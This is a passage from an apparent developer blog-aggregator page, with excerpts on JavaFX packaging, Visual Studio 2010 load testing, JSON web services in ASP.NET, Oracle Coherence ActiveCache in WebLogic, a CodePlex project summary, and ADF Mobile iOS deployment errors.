name="package-bundle"> <taskdef resource="com/sun/javafx/tools/ant/antlib.xml" uri="javafx:com.sun.javafx.tools.ant" classpath="${javafx.tools.ant.jar}"/> <fx:deploy nativeBundles="all" width="100" height="100" outdir="native-packages/" outfile="MyJavaApp"> <info title="Sample project" vendor="Me" description="Test built from Java executable jar"/> <fx:application id="myapp" version="1.0" mainClass="app.Main" name="MyJavaApp"/> <fx:resources> <fx:fileset dir="dist"> <include name="javamain.jar"/> <include name="lib/somelib.jar"/> <include name="morelibs/anotherlib.jar"/> </fx:fileset> </fx:resources> </fx:deploy> </target> Option to disable proxy setup in the JavaFX launcher Since JavaFX 2.2 (part of JDK 7u6) properly packaged JavaFX applications  have proxy settings initialized according to Java Runtime configuration settings. This is handy for most of the application accessing network with one exception. If your application explicitly sets networking properties (e.g. socksProxyHost) then they must be set before networking stack is initialized. Proxy detection will initialize networking stack and therefore your custom settings will be ignored. One way to disable proxy setup by the embedded JavaFX launcher is to pass "-Djavafx.autoproxy.disable=true" on the command line. This is good for troubleshooting (proxy detection may cause significant startup time increases if network is misconfigured) but not really user friendly. Now proxy setup will be disabled if manifest of main application jar has "JavaFX-Feature-Proxy" entry with value "None". 
Here is simple example of adding this entry using <fx:jar> task: <fx:jar destfile="dist/sampleapp.jar"> <fx:application refid="myapp"/> <fx:resources refid="myresources"/> <fileset dir="build/classes"/> <manifest> <attribute name="JavaFX-Feature-Proxy" value="None"/> </manifest> </fx:jar> Ability to specify codebase for WebStart application JavaFX applications do not need to specify codebase (i.e. absolute location where application code will be deployed) for most of real world deployment scenarios. This is convenient as application does not need to be modified when it is moved from development to deployment environment. However, some developers want to ensure copies of their application JNLP file will redirect to master location. This is where codebase is needed. To avoid need to edit JNLP file manually <fx:deploy> task now accepts optional codebase attribute. If attribute is not specified packager will generate same no-codebase files as before. If codebase value is explicitly specified then generated JNLP files (including JNLP content embedded into web page) will use it.  Here is an example: <fx:deploy width="600" height="400" outdir="Samples" codebase="http://localhost/codebaseTest" outfile="TestApp"> .... </fx:deploy> Option to update existing jar file JavaFX packaging procedures are optimized for new application that can use ant or command line javafxpackager utility. This may lead to some redundant steps when you add it to your existing build process. One typical situation is that you might already have a build procedure that produces executable jar file with custom manifest. To properly package it as JavaFX executable jar you would need to unpack it and then use javafxpackager or <fx:jar> to create jar again (and you need to make sure you pass all important details from your custom manifest). We added option to pass jar file as an input to javafxpackager and <fx:jar>. This simplifies integration of JavaFX packaging tools into existing build  process as postprocessing step. By the way, we are looking for ways to simplify this further. Please share your suggestions! On the technical side this works as follows. Both <fx:jar> and javafxpackager will attempt to update existing jar file if this is the only input file. Update process will add JavaFX launcher classes and update the jar manifest with JavaFX attributes. Your custom attributes will be preserved. Update could be performed in place or result may be saved to a different file. Main-Class and Class-Path elements (if present) of manifest of input jar file will be used for JavaFX application  unless they are explicitly overriden in the packaging command you use. E.g. attribute mainClass of <fx:application> (or -appclass in the javafxpackager case) overrides existing Main-Class in the jar manifest. Note that class specified in the Main-Class attribute could either extend JavaFX Application or provide static main() method. 
Here are examples of updating jar file using javafxpackager: Create new JavaFX executable jar as a copy of given jar file javafxpackager -createjar -srcdir dist -srcfiles fish_proto.jar -outdir dist -outfile fish.jar  Update existing jar file to be JavaFX executable jar and use test.Fish as main application class javafxpackager -createjar -srcdir dist -appclass test.Fish -srcfiles fish.jar -outdir dist -outfile fish.jar  And here is example of using <fx:jar> to create new JavaFX executable jar from the existing fish_proto.jar: <fx:jar destfile="dist/fish.jar"> <fileset dir="dist"> <include name="fish_proto.jar"/> </fileset> </fx:jar> Self-Contained Applications: Specify application icon The only way to specify application icon for self-contained application using tools in JDK 7 update 6 is to use drop-in resources. Now this bug is resolved and you can also specify icon using <fx:icon> tag. Here is an example: <fx:deploy ...> <fx:info> <fx:icon href="default.png"/> </fx:info> ... </fx:deploy> Few things to keep in mind: Only default kind of icon is applicable to self-contained applications (as of now) Icon should follow platform specific rules for sizes and image format (e.g. .ico on Windows and .icns on Mac) Self-Contained Applications: Pass parameters on the command line JavaFX applications support two types of application parameters: named and unnamed (see the API for Application.Parameters). Static named parameters can be added to the application package using <fx:param> and unnamed parameters can be added using <fx:argument>. They are applicable to all execution modes including standalone applications. It is also possible to pass parameters to a JavaFX application from a Web page that hosts it, using <fx:htmlParam>.  Prior to JavaFX 2.2, this was only supported for embedded applications. Starting from JavaFX 2.2, <fx:htmlParam> is applicable to Web Start applications also. See JavaFX deployment guide for more details on this. However, there was no way to pass dynamic parameters to the self-contained application. This has been improved and now native launchers will  delegate parameters from command line to the application code. I.e. to pass parameter to the application you simply need to run it as "myapp.exe somevalue" and then use getParameters().getUnnamed().get(0) to get "somevalue".

    Read the article

  • Load and Web Performance Testing using Visual Studio Ultimate 2010-Part 2

    - by Tarun Arora
    Welcome back, in part 1 of Load and Web Performance Testing using Visual Studio 2010 I talked about why Performance Testing the application is important, the test tools available in Visual Studio Ultimate 2010 and various test rig topologies. In this blog post I’ll get into the details of web performance & load tests as well as why it’s important to follow a goal based pattern while performance testing your application. Tools => Options => Test Tools Have you visited the treasures of Visual Studio Menu bar tools => Options => Test Tools lately? The options to enable disable prompts on creating, editing, deleting or running manual/automated tests can be controller from here. The default test project language and default test types created on a new test project creation could be selected/unselected from here. Ever wondered how you can change the default limit of 25 test results, this can again be changed from here. If you record a lot of Web Tests and wish for the web test recorder to start with “that” URL populated, well this again can be specified from here. If you haven’t so far, I would urge you to spend 2 minutes in the test tools options.   Test Menu => Ready Steady Test Action! The Test tools are under the Test Menu in Visual Studio, apart from being able to create a new Test and Test List you can also load an existing vsmdi file. You can also manage your test controllers from here. A solution can have one or more test setting files, but there can only be one active test settings file at any time. Again, this selection can be done from here.  You can open the various test windows from under the windows option from the test menu. If you open the Test view window you will see that you have the option to group the tests by work items, project, test type, etc. You can set these properties by right clicking a test in the test list and choosing properties from the context menu.    So, what is a vsmdi file? vsmdi stands for Visual Studio Test Metadata File. Placed under the Solution Items this file keeps track of the list of unit tests in your solution. If you open the vsmdi file as an xml file you will see a series of Test Links nested with in the list Test List tags along with the Run Configuration tag. When in visual studio you run tests, the IDE looks at the vsmdi file to see what tests need to be run. You also have the option of using the vsmdi file in your team builds to specify which tests need to run as part of the build. Refer here for a walkthrough from a fellow blogger on how to use the vsmdi file in the team builds. Web Performance Test – The Truth! In Visual Studio 2010 “Web Tests” have been renamed to “Web Performance Tests”. Apart from renaming this test type there have been several improvements to this test type in visual studio 2010. I am very active on the MSDN Visual Studio And Load Testing forum and a frequent question from many users is “Do Web Tests support Pages that run JavaScript?” I will start with a little bit of background before answering this question. Web Performance Tests operate at the HTTP Layer, but why? To enable you to generate high loads with a relatively low amount of hardware, Web performance tests are driven at the protocol layer rather than instantiating a browser.The most common source of confusion is that users do not realize Web Performance Tests work at the HTTP layer. The tool adds to that misconception. 
After all, you record in IE, and when running a Web test you can select which browser to use, and then the result viewer shows the results in a browser window. So that means the tests run through the browser, right? NO! The Web test engine works at the HTTP layer, and does not instantiate a browser. What does that mean? In the diagram below, you can see there are no browsers running when the engine is sending and receiving requests. Does that mean I can't test pages that use JavaScript? The best example of JavaScript generating HTTP traffic is AJAX calls. The most common examples of browser plugins are Silverlight and Flash. The Web test recorder will record HTTP traffic from AJAX calls and from most (but not all) browser plugins. This means you will still be able to web performance test pages that use JavaScript or a plugin and play back the results, but the playback engine will not show the JavaScript or plugin results in the 'browser control'. If you want to test the page behaviour that results from the JavaScript or plugin, consider using Coded UI Tests. This page looks like it failed, when in fact it succeeded! Looking closely at the response, and subsequent requests, it is clear the operation succeeded. As stated above, the reason the browser control is showing this message is that JavaScript has been disabled in this control. So, to reiterate, the web performance test recorder: - Sends and receives data at the HTTP layer. - Does NOT run a browser. - Does NOT run JavaScript. - Does NOT host ActiveX controls or plugins. There is a great series of blog posts from Ed Glas; I would highly recommend his blog to anyone performing load/performance testing through Visual Studio. Demo – Web Performance Test [Demo] - Visual Studio Ultimate 2010: Test Settings and Configuration [Demo] – Visual Studio Ultimate 2010: Web Performance Test In this short video I try and answer the following questions: Why is performance testing important? How does Visual Studio help you performance test your applications? How do I record a web performance test? How do I make a web performance test data driven, transaction driven, loop driven, convert to code, add validations? Best practices for recording Web Performance Tests. I have a web performance test, what next? Creating the Web Performance Test was the first step towards load testing your application. Now that we have the base test we can test the page behaviour when N users access the page. Have you ever had the head of business call you and mention that the marketing team has done a fantastic job and is expecting increased traffic on the web site; can the website survive the weekend with that additional load? This is the perfect opportunity to capacity test your application to see how your website holds up under various levels of load, and you can work the results backwards to see how much hardware you may need to scale up your application to survive the weekend. Apart from that, it is always a good idea to have some benchmarks around how the application performs under light load for a short duration and under heavy load for a long duration, and to soak test the application by running a constant load for a week or two to record the effects of constant load over really long durations; this is a great way of identifying how your application handles the default IIS application pool recycle, which by default is configured to occur once every 29 hours. These benchmarks will act as the perfect yardstick to measure performance gains when you start making improvements.
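As a quick illustration of the "convert to code" option mentioned above, a coded web performance test is simply a class that derives from WebTest and yields WebTestRequest objects; the playback engine issues them at the HTTP layer, exactly as described. The sketch below is hand-written and the URLs and class name are placeholders; a real coded test is normally produced by the Generate Code command in the Web Performance Test editor, so treat this as an outline rather than generated output:

    using System.Collections.Generic;
    using Microsoft.VisualStudio.TestTools.WebTesting;

    public class SampleCodedWebTest : WebTest
    {
        public override IEnumerator<WebTestRequest> GetRequestEnumerator()
        {
            // Each yielded request is sent over HTTP; no browser and no JavaScript are involved.
            WebTestRequest home = new WebTestRequest("http://myserver/myapp/");
            yield return home;

            // A second request, e.g. a search page hit recorded during the scenario.
            WebTestRequest search = new WebTestRequest("http://myserver/myapp/search?q=test");
            yield return search;
        }
    }

Because the test is now plain C#, you can add data binding, loops and custom validation in code before plugging it into a load test.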
BUT there are some best practices! => Goal Based Load Testing Approach Since the subject is vast and there are a lot of things to measure and analyse, … it is very easy to get distracted from the real goal!  You can optimize your application once you know where the pain points are. There is no point performing a load test of 5000 users if your intranet application will only have a 100 simultaneous users, it is important to keep focussed on the real goals of the project. So the idea is to have a user story around your load testing scenarios and test realistically. So it is recommended that you follow the below outline, It is an Iterative process, refine your objectives, identify the key scenarios, what is the expected workload, key metrics you want to report, record the web performance tests, simulate load and analyse results. Is your application already deployed in Production? This is great! You can analyse the IIS Logs to understand the user behaviour… But what are IIS LOGS? The IIS logs allow you to record events for each application and Web site on the Web server. You can create separate logs for each of your applications and Web sites. Logging information in IIS goes beyond the scope of the event logging or performance monitoring features provided by Windows. The IIS logs can include information, such as who has visited your site, what the visitor viewed, and when the information was last viewed. You can use the IIS logs to identify any attempts to gain unauthorized access to your Web server. How to configure IIS LOGS? For those Ninjas who already have IIS Logs configured (by the way its on by default) and need a way to analyse the IIS Logs, can use the Windows IIS Utility – Log Parser. Log Parser is a very powerful tool that provides a generic SQL-like language on top of many types of data like IIS Logs, Event Viewer entries, XML files, CSV files, File System and others; and it allows you to export the result of the queries to many output formats such as CSV, XML, SQL Server, Charts and others; and it works well with IIS 5, 6, 7 and 7.5. Frequently used Log Parser queries. Demo – Load Test [Demo]–Visual Studio Ultimate 2010: Load Testing   In this short video I try and answer the following questions, - Types of Performance Testing? - Perform Goal driven Load Testing, analyse Test Run Result and Generate a report? Recap A quick recap of what we have covered so far,     Thank you for taking the time out and reading this blog post, in part III of this blog series I’ll be getting into the details of Test Result Analysis, Test Result Drill through, Test Report Generation, Test Run Comparison, and the Asp.net Profiler. If you enjoyed the post, remember to subscribe to http://feeds.feedburner.com/TarunArora. Questions/Feedback/Suggestions, etc please leave a comment. See you on in Part III   Share this post : CodeProject
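If Log Parser is not installed on the box, a quick alternative for simple questions (for example, the most requested URLs in an IIS log) is a few lines of C#. This is a rough sketch, assuming a W3C extended log whose #Fields header includes cs-uri-stem; the log file path is a placeholder:

    using System;
    using System.Collections.Generic;
    using System.IO;
    using System.Linq;

    class IisLogTopUrls
    {
        static void Main()
        {
            // Placeholder path; point this at one of your IIS log files.
            string logFile = @"C:\inetpub\logs\LogFiles\W3SVC1\u_ex120101.log";
            int uriIndex = -1;
            var hits = new Dictionary<string, int>(StringComparer.OrdinalIgnoreCase);

            foreach (string line in File.ReadLines(logFile))
            {
                if (line.StartsWith("#Fields:"))
                {
                    // The #Fields header tells us which column holds cs-uri-stem.
                    string[] fields = line.Substring("#Fields:".Length).Trim().Split(' ');
                    uriIndex = Array.IndexOf(fields, "cs-uri-stem");
                }
                else if (!line.StartsWith("#") && uriIndex >= 0)
                {
                    string[] parts = line.Split(' ');
                    if (uriIndex < parts.Length)
                    {
                        string url = parts[uriIndex];
                        hits[url] = hits.ContainsKey(url) ? hits[url] + 1 : 1;
                    }
                }
            }

            // Print the ten most requested URLs with their hit counts.
            foreach (var entry in hits.OrderByDescending(h => h.Value).Take(10))
                Console.WriteLine("{0,6}  {1}", entry.Value, entry.Key);
        }
    }

For anything beyond a quick look, Log Parser's SQL-like queries and its many output formats remain the better tool, as the post suggests.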

    Read the article

  • Converting a generic list into JSON string and then handling it in java script

    - by Jalpesh P. Vadgama
    We all know that JSON (JavaScript Object Notation) is very useful for manipulating strings on the client side with JavaScript, and its performance across browsers is very good. So let's create a simple example: we will build a generic list, convert that list into a JSON string, and then call the web service from JavaScript and handle the result in JavaScript. To do this we need an info class (type) for which we are going to create the generic list. Here is the code for that; I have created a simple class with two properties, UserId and UserName. public class UserInfo { public int UserId { get; set; } public string UserName { get; set; } } Now let's create a web service whose web method will build the list and then convert it into a JSON string with the JavaScriptSerializer class. Here is the web service class. using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; namespace Experiment.WebService { /// <summary> /// Summary description for WsApplicationUser /// </summary> [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] [System.ComponentModel.ToolboxItem(false)] // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. [System.Web.Script.Services.ScriptService] public class WsApplicationUser : System.Web.Services.WebService { [WebMethod] public string GetUserList() { List<UserInfo> userList = new List<UserInfo>(); for (int i = 1; i <= 5; i++) { UserInfo userInfo = new UserInfo(); userInfo.UserId = i; userInfo.UserName = string.Format("{0}{1}", "J", i.ToString()); userList.Add(userInfo); } System.Web.Script.Serialization.JavaScriptSerializer jSearializer = new System.Web.Script.Serialization.JavaScriptSerializer(); return jSearializer.Serialize(userList); } } } Note: you must have the attribute '[System.Web.Script.Services.ScriptService]' on the web service class, as this attribute enables the web service to be called from the client side. Now that we have created the web service class, let's create a JavaScript function 'GetUserList' which will call the web service from JavaScript, like the following: function GetUserList() { Experiment.WebService.WsApplicationUser.GetUserList(ReuqestCompleteCallback, RequestFailedCallback); } As you can see, we pass two callback functions, ReuqestCompleteCallback and RequestFailedCallback, which handle the result and errors from the web service. ReuqestCompleteCallback will handle the result of the web service, and if an error comes then RequestFailedCallback will print the error. Following is the code for both functions. function ReuqestCompleteCallback(result) { result = eval(result); var divResult = document.getElementById("divUserList"); CreateUserListTable(result); } function RequestFailedCallback(error) { var stackTrace = error.get_stackTrace(); var message = error.get_message(); var statusCode = error.get_statusCode(); var exceptionType = error.get_exceptionType(); var timedout = error.get_timedOut(); // Display the error. var divResult = document.getElementById("divUserList"); divResult.innerHTML = "Stack Trace: " + stackTrace + "<br/>" + "Service Error: " + message + "<br/>" + "Status Code: " + statusCode + "<br/>" + "Exception Type: " + exceptionType + "<br/>" + "Timedout: " + timedout; } In ReuqestCompleteCallback above you can see that we have used the 'eval' function, which parses the JSON string into an enumerable JavaScript array.
Then we call a function named 'CreateUserListTable', which builds a table string and places that string in a div. Here is the code for that function. function CreateUserListTable(userList) { var tablestring = '<table ><tr><td>UserID</td><td>UserName</td></tr>'; for (var i = 0, len = userList.length; i < len; ++i) { tablestring=tablestring + "<tr>"; tablestring=tablestring + "<td>" + userList[i].UserId + "</td>"; tablestring=tablestring + "<td>" + userList[i].UserName + "</td>"; tablestring=tablestring + "</tr>"; } tablestring = tablestring + "</table>"; var divResult = document.getElementById("divUserList"); divResult.innerHTML = tablestring; } Now let's create the div which will hold all the HTML generated by this function; here is the code of my web page. We also need to add a script reference to enable the web service from the client side. Here is all the HTML code we have. <form id="form1" runat="server"> <asp:ScriptManager ID="myScirptManger" runat="Server"> <Services> <asp:ServiceReference Path="~/WebService/WsApplicationUser.asmx" /> </Services> </asp:ScriptManager> <div id="divUserList"> </div> </form> As we have not yet defined where the 'GetUserList' function gets called, let's call it in the window onload event of JavaScript, like the following. window.onload=GetUserList; That's it. Now let's run it in the browser to see whether it works, and here is the output in the browser, as expected. This was a very basic example, but you can create your own JavaScript-enabled grid from this, and you can see the possibilities are unlimited here. Stay tuned for more.. Happy programming.. Technorati Tags: JSON,Javascript,ASP.NET,WebService
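A small companion sketch (not part of the original post): the same JavaScriptSerializer can turn the JSON string back into the generic list on the server, which is handy for unit testing the output of the web method. The class and method names below are invented for the example and reuse the UserInfo type defined above.

    using System.Collections.Generic;
    using System.Web.Script.Serialization;

    public class UserListReader
    {
        public static List<UserInfo> ReadUsers(string json)
        {
            // Deserialize<T> reverses the Serialize call made inside GetUserList().
            JavaScriptSerializer serializer = new JavaScriptSerializer();
            return serializer.Deserialize<List<UserInfo>>(json);
        }
    }

Calling ReadUsers on the string returned by GetUserList() should yield the five UserInfo objects created in the loop, which makes it easy to assert on the serialized output without touching the browser.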

    Read the article

  • Integrating Coherence & Java EE 6 Applications using ActiveCache

    - by Ricardo Ferreira
    OK, so you are a developer and are starting a new Java EE 6 application using the most wonderful features of the Java EE platform, like Enterprise JavaBeans, JavaServer Faces, CDI, JPA and other cool technologies. And your architecture needs to hold pieces of data in distributed caches to improve the application's performance, scalability and reliability? If this is the scenario you are currently facing, maybe you should look closely at the solutions provided by Oracle WebLogic Server. Oracle has integrated WebLogic Server with its champion data caching technology, Oracle Coherence. This seamless integration between these two products provides a comprehensive environment to develop applications without the complexity of extra Java code to manage the cache as a dependency, since Oracle provides a DI ("Dependency Injection") mechanism for Coherence, the same DI mechanism available in standard Java EE applications. This feature is called ActiveCache. In this article, I will show you how to configure ActiveCache in WebLogic and in your Java EE application. Configuring WebLogic to manage Coherence Before you start changing your application to use Coherence, you need to configure your Coherence distributed cache. The good news is that you can manage all of this without writing a single line of XML or Java code. This configuration can be done entirely in the WebLogic administration console. The first thing to do is set up a Coherence cluster. A Coherence cluster is a set of Coherence JVMs configured to form one single view of the cache. This means that you can insert or remove members of the cluster without the client application (the application that produces or consumes data from the cache) knowing about the changes. This concept allows your solution to scale out without changing the application server JVMs; you can grow your application in the data grid layer alone. To start the configuration, you need to configure a machine that points to the server on which you want to execute the Coherence JVMs. WebLogic Server allows you to do this very easily using the Administration Console. In this example, I will call the machine "coherence-server". Remember that in order for the machine concept to work, you need to ensure that the NodeManager is running on the target server that the machine points to. The NodeManager executable can be found in <WLS_HOME>/server/bin/startNodeManager.sh. The next thing to do is to configure a Coherence cluster. In the WebLogic administration console, go to Environment > Coherence Clusters and click "New". Call this Coherence cluster "my-coherence-cluster". Click Next. Specify a valid cluster address and port; the Coherence members will communicate with each other through this address and port. Our Coherence cluster is now configured. Now it is time to configure the Coherence members and add them to this cluster. In the WebLogic administration console, go to Environment > Coherence Servers and click "New". In the field "Name", enter "coh-server-1". In the field "Machine", associate this Coherence server with the machine "coherence-server". In the field "Cluster", associate this Coherence server with the cluster named "my-coherence-cluster". Click "Finish". Start the Coherence server using the "Control" tab of the WebLogic administration console. This will instruct WebLogic to start a new Coherence JVM on the target machine, and that JVM should join the pre-defined Coherence cluster.
Configuring your Java EE Application to Access Coherence Now lets pass to the funny part of the configuration. The first thing to do is to inform your Java EE application which Coherence cluster to join. Oracle had updated WebLogic server deployment descriptors so you will not have to change your code or the containers deployment descriptors like application.xml, ejb-jar.xml or web.xml. In this example, I will show you how to enable DI ("Dependency Injection") to a Coherence cache from a Servlet 3.0 component. In the WEB-INF/weblogic.xml deployment descriptor, put the following metadata information: <?xml version="1.0" encoding="UTF-8"?> <wls:weblogic-web-app xmlns:wls="http://xmlns.oracle.com/weblogic/weblogic-web-app" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd http://xmlns.oracle.com/weblogic/weblogic-web-app http://xmlns.oracle.com/weblogic/weblogic-web-app/1.4/weblogic-web-app.xsd"> <wls:context-root>myWebApp</wls:context-root> <wls:coherence-cluster-ref> <wls:coherence-cluster-name>my-coherence-cluster</wls:coherence-cluster-name> </wls:coherence-cluster-ref> </wls:weblogic-web-app> As you can see, using the "coherence-cluster-name" tag, we are informing our Java EE application that it should join the "my-coherence-cluster" when it loads in the web container. Without this information, the application will not be able to access the predefined Coherence cluster. It will form its own Coherence cluster without any members. So never forget to put this information. Now put the coherence.jar and active-cache-1.0.jar dependencies at your WEB-INF/lib application classpath. You need to deploy this dependencies so ActiveCache can automatically take care of the Coherence cluster join phase. This dependencies can be found in the following locations: - <WLS_HOME>/common/deployable-libraries/active-cache-1.0.jar - <COHERENCE_HOME>/lib/coherence.jar Finally, you need to write down the access code to the Coherence cache at your Servlet. In the following example, we have a Servlet 3.0 component that access a Coherence cache named "transactions" and prints into the browser output the content (the ammount property) of one specific transaction. package com.oracle.coherence.demo.activecache; import java.io.IOException; import javax.annotation.Resource; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import com.tangosol.net.NamedCache; @WebServlet("/demo/specificTransaction") public class TransactionServletExample extends HttpServlet { @Resource(mappedName = "transactions") NamedCache transactions; protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int transId = Integer.parseInt(request.getParameter("transId")); Transaction transaction = (Transaction) transactions.get(transId); response.getWriter().println("<center>" + transaction.getAmmount() + "</center>"); } } Thats it! No more configuration is necessary and you have all set to start producing and getting data to/from Coherence. As you can see in the example code, the Coherence cache are treated as a normal dependency in the Java EE container. The magic happens behind the scenes when the ActiveCache allows your application to join the defined Coherence cluster. 
The most interesting thing about this approach is that no matter which type of Coherence cache you are using (Distributed, Partitioned, Replicated, WAN-Remote), for the client application it is just a simple attribute member of the com.tangosol.net.NamedCache type, and it is all managed by the Java EE container as a dependency. This means that if you inject the same dependency (the Coherence cache named "transactions") in another Java EE component (a JSF managed bean, a stateless EJB), the cache will be the same. Cool, isn't it? Thanks to the CDI technology, we can extend the same support to non-Java EE standard components like simple POJOs. This means that you are not forced to use only Servlets, EJBs or JSF in order to inject Coherence caches; you can take the same approach for regular POJOs created for you and managed by lightweight containers like Spring or Seam.

    Read the article

  • CodePlex Daily Summary for Sunday, June 06, 2010

    CodePlex Daily Summary for Sunday, June 06, 2010New ProjectsActive Worlds Dot Net Wrapper (Based on AwSdk): Active Worlds Dot Net Wrapper (Based on AwSdk)Combina: Smart calculator for large combinatorial calculations.Concurrent Cache: ConcurrentCache is a smart output cache library extending OutputCacheProvider. It consists of in memory, cache files and compressed files modes and...Decay: Personal use. For learningFazTalk: FazTalk is a suite of tools and products that are designed to improve collaboration and workflow interactions. FazTalk takes an innovative approach...grouped: A peer to peer text editor, written in C# [update] I wrote this little thing a while back and even forgot about it, I stopped coding for more tha...HitchARide MVC 2 Sample: An MVC 2 sample written as part of the Microsoft 2010 London Web Camp based on the wireframes at http://schematics.earthware.co.uk/hitcharide. Not...Inspiration.Web: Description: A simple (but entertaining) ASP.NET MVC (C#) project to suggest random code names for projects. Intended audience: People who ne...NetFileBrowser - TinyMCE: tinyMCE file plugin with asp.netOil Slick Live Feeds: All live feeds from BP's Remotely Operated VehiclesParticle Lexer: Parser and Tokenizer libraryPdf Form Tool: Pdf Form Tool demonstrates how the iTextSharp library could be used to fill PDF forms. The input data is provided as a csv file. The application ...Planning Poker Windows Mobile 7: This project is a Planning Poker application for Windows Mobile 7 (and later?). RandomRat: RandomRat is a program for generating random sets that meet specific criteriaScience.NET: A scientific library written in managed code. It supports advanced mathematics (algebra system, sequences, statistics, combinatorics...), data stru...Spider Compiler: Spider Compiler parses the input of a spider programming source file and compiles it (with help of csc.exe; the C#-Compiler) to an exe-file. This p...Sununpro: sunun's project for study by team foundation server.TFS Buddy: An application that manipulates your I-Buddy whenever something happens in your Team Foundation ServerValveSoft: ValveSysWiiMote Physics: WiiMote Physics is an application that allows you to retrieve data from your WiiMote or Balance Board and display it in real-time. It has a number...WinGet: WinGet is a download manager for Windows. You can drag links onto the WinGet Widget and it will download a file on the selected folder. It is dev...XProject.NET: A project management and team collaboration platformNew Releases.NET DiscUtils: Version 0.9 Preview: This release is still under development. New features available in this release: Support for accessing short file names stored in WIM files Incr...Active Worlds Dot Net Wrapper (Based on AwSdk): Active World Dot Net Wrapper (0.0.1.85): Based on AwSdk 85AwSdk UnOfficial Wrapper Howto Use: C# using AwWrapper; VB.Net Import AwWrapperAjaxControlToolkit additional extenders: ZhecheAjaxControls for .NET3.5: Used AJAX Control Toolkit Release Notes - April 12th 2010 Release Version 40412. Fixed deadlock in long operation canceling Some other fixesAnyCAD: AnyCAD.v1.2.ENU.Install: http://www.anycad.net Parametric Modeling *3D: Sphere, Box, Cylinder, Cone •2D: Line, Rectangle, Arc, Arch, Circle, Spline, Polygon •Feature: Extr...Community Forums NNTP bridge: Community Forums NNTP Bridge V29: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. 
This release has ad...Concurrent Cache: 1.0: This is the first release for the ConcurrentCache library.Configuration Section Designer: 2.0.0: This is the first Beta Release for VS 2010 supportDoxygen Browser Addin for VS: Doxygen Browser Addin - v0.1.4 Beta: Support for Visual Studio 2010 improved the logging of errors (Event Logs) Fixed some issues/bugs Hot key for navigation "Control + F1, Contr...Folder Bookmarks: Folder Bookmarks 1.6.2: The latest version of Folder Bookmarks (1.6.2), with new UI changes. Once you have extracted the file, do not delete any files/folders. They are n...HERB.IQ: Beta 0.1 Source code release 5: Beta 0.1 Source code release 5Inspiration.Web: Initial release (deployment package): Initial release (deployment package)NetFileBrowser - TinyMCE: Demo Project: Demo ProjectNetFileBrowser - TinyMCE: NetFileBrowser: NetImageBrowserNLog - Advanced .NET Logging: Nightly Build 2010.06.05.001: Changes since the last build:2010-06-04 23:29:42 Jarek Kowalski Massive update to documentation generator. 2010-05-28 15:41:42 Jarek Kowalski upda...Oil Slick Live Feeds: Oil Slick Live Feeds 0.1: A the first release, with feeds from the MS Skandi, Boa Deep C, Enterprise and Q4000. They are live streams from the ROV's monitoring the damaged...Pcap.Net: Pcap.Net 0.7.0 (46671): Pcap.Net - June 2010 Release Pcap.Net is a .NET wrapper for WinPcap written in C++/CLI and C#. It Features almost all WinPcap features and includes...sqwarea: Sqwarea 0.0.289.0 (alpha): API supportTFS Buddy: TFS Buddy First release (Beta 1): This is the first release of the TFS Buddy.Visual Studio DSite: Looping Animation (Visual C++ 2008): A solider firing a bullet that loops and displays an explosion everytime it hits the edge of the form.WiiMote Physics: WiiMote Physics v4.0: v4.0.0.1 Recovered from existing compiled assembly after hard drive failure Now requires .NET 4.0 (it seems to make it run faster) Added new c...WinGet: Alpha 1: First Alpha of WinGet. It includes all the planned features but it contains many bugs. Packaged using 7-Zip and ClickOnce.Most Popular ProjectsWBFS ManagerRawrAJAX Control ToolkitMicrosoft SQL Server Product Samples: DatabaseSilverlight ToolkitWindows Presentation Foundation (WPF)PHPExcelpatterns & practices – Enterprise LibraryMicrosoft SQL Server Community & SamplesASP.NETMost Active ProjectsCommunity Forums NNTP bridgeRawrpatterns & practices – Enterprise LibraryGMap.NET - Great Maps for Windows Forms & PresentationN2 CMSIonics Isapi Rewrite FilterStyleCopsmark C# LibraryFarseer Physics Enginepatterns & practices: Composite WPF and Silverlight

    Read the article

  • Diagnosing ADF Mobile iOS deployment problems

    - by Chris Muir
    From time to time I encounter customers who have taken possession of a brand new Apple Mac, have that excited "I've just spent more on a computer then I ever wanted to but it's okay" crazy gleam in their eye, but on pre-loading all the necessary software for Oracle's ADF Mobile to start their mobile campaign, following Oracle's setup instructions and deploying their first app to Apple's XCode iPhone Simulator they hit this error message in the JDeveloper Log-Deployment window: [01:36:46 PM] Deployment cancelled. [01:36:46 PM] ----  Deployment incomplete  ----. [01:36:46 PM] Failed to build the iOS application bundle. [01:36:46 PM] Deployment failed due to one or more errors returned by '/Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild'.  The following is a summary of the returned error(s): Command-line execution failed (Return code: 69) "Oh, return code 69, I know that well" I hear you say.  Admittedly the error code is less than useful besides drawing some titters from the peanut gallery. Before explaining what's gone wrong, I think it's useful to teach customers how to diagnose these issues themselves.  When ADF Mobile commences a deployment, be it to Apple's iOS or Google's Android platforms, JDeveloper and ADF Mobile do a good job in the Log window of showing you what the deployment process entails.  In the case of deploying to iOS the log window will literally include the XCode commands executed to complete the deployment cycle. As example here's the log output that was produced before the error message was raised.... take the opportunity to read this line by line and note the command line calls highlighted in blue: (Note some of the following lines have been split over multiple lines to suit reading on this blog, each original line is preceded by a timestamp. Ensure to check the exact commands from JDev) [01:36:33 PM] Target platform is (iOS). [01:36:33 PM] Beginning deployment of ADF Mobile application 'LayoutDemo' to iOS using profile 'IOS_MOBILE_NATIVE_archive1'. [01:36:34 PM] Command-line executed: [/Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild, -version] [01:36:34 PM] Command-line execution succeeded. [01:36:34 PM] Running dependency analysis... [01:36:34 PM] Building... [01:36:34 PM] Deploying 3 profiles... [01:36:35 PM] Wrote Archive Module to /Users/chris/fmw/jdeveloper/jdev/extensions/ oracle.adf.mobile/Samples/PublicSamples/LayoutDemo/ApplicationController/ deploy/ApplicationController.jar [01:36:35 PM] WARNING: No Resource Catalog enabled ADF components found to package [01:36:36 PM] 